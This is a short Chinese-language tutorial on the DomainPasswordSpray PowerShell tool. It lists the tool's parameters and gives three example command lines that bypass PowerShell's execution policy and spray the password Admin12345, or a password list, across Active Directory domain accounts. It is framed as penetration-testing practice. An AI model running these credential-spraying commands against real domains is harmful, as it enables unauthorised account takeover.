0x01 介绍
UserList - Optional UserList parameter. This will be generated automatically if not specified.
Password - A single password that will be used to perform the password spray.
PasswordList - A list of passwords one per line to use for the password spray (Be very careful not to lockout accounts).
OutFile - A file to output the results to.
Domain - A domain to spray against.
Force - Forces the spray to continue without prompting for confirmation.
0x02 实践
用法一:
自动从当前用户的域中生成用户列表,并尝试使用每个用户名和密码Admin12345进行身份验证
powershell -exec bypass
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Admin12345
用法二:
指定用户列表,指定单个密码进行爆破。
Invoke-DomainPasswordSpray -Userlist user.txt -Domain 0day -password Admin12345
用法三:
指定用户、密码列表进行爆破,输出到特定文件中。
Invoke-DomainPasswordSpray -Userlist user.txt -Domain 0day -PasswordList .\pass.txt -OutFile 1.txt
爆破成功结果: